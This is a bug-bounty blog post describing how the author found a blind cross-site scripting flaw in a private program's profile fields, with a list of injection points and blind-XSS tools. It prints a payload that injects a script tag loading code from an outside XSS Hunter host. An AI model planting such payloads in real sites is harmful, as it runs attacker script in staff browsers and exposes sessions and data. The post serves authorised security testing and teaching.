How I got my first Blind XSS on Private Program

Raghuveer Singh Chouhan
3 min readApr 25, 2021

Hello everyone, I am Raghuveer Singh Chouhan and, this is my first blog on Blind XSS. Today I will explain how I found Blind XSS on a private program.

#What is Blind XSS
Blind XSS is a flavor of cross-site scripting (XSS), where the attacker “blindly” deploys a series of malicious payloads on web pages that are likely to save them to a persistent state (like in a database, or a log file).

#Where to look for Blind XSS

1. Contact page
2. Passwords(You never know if the other side doesn’t properly handle input and if your password is in View mode)
3. Address fields
4. Name field
5. forms
6. Set User-Agent to a Blind XSS payload(You can do that easily from Burp suite.)
7. Feedback page
8. Chat Applications

#! Tools for Blind Cross-Site Scripting
Normally I use XSSHunter for finding Blind XSS. There are more tools available on the Internet that are: XSSHunter, KnoXSS, bXSS Hunter, and many more.

As this was a private program so I will be using example.com

After signing in to the account now we are able to see all injecting points of the application so we can send our malicious payload to the backend team.
The application has a profile page where user can add their details like first name, last name, address, mobile no.,position,website etc. and upload a profile pic.

Right Now I have one question in my mind?
Can I inject any special character or not, if yes then I should try to inject XSS payload.

So I just tried to inject XSS payload in all input fields for reflected or stored XSS but unfortunately, the XSS payload didn’t execute.( Ignore my English & Grammar)

Now I started injecting my Blind XSS script/Payload in all the field except the field which contains email ID and Mobile No.

Payload: "><script src=https://@shr3e.xss.ht></script>Tip: always check all input field

After 20–30 mins an email arrived on my Mail Account that is from XSS Hunter and it says your payload is just triggered. ‘’’’BOOM’’’’’

I just WOW!

I quickly visit my XSSHunter account to check all details about the vulnerability.

Thanks for Reading …..

Follow me :

--

--

Raghuveer Singh Chouhan

Cyber Security Engineer || Bug Bounty hunter || Security Researcher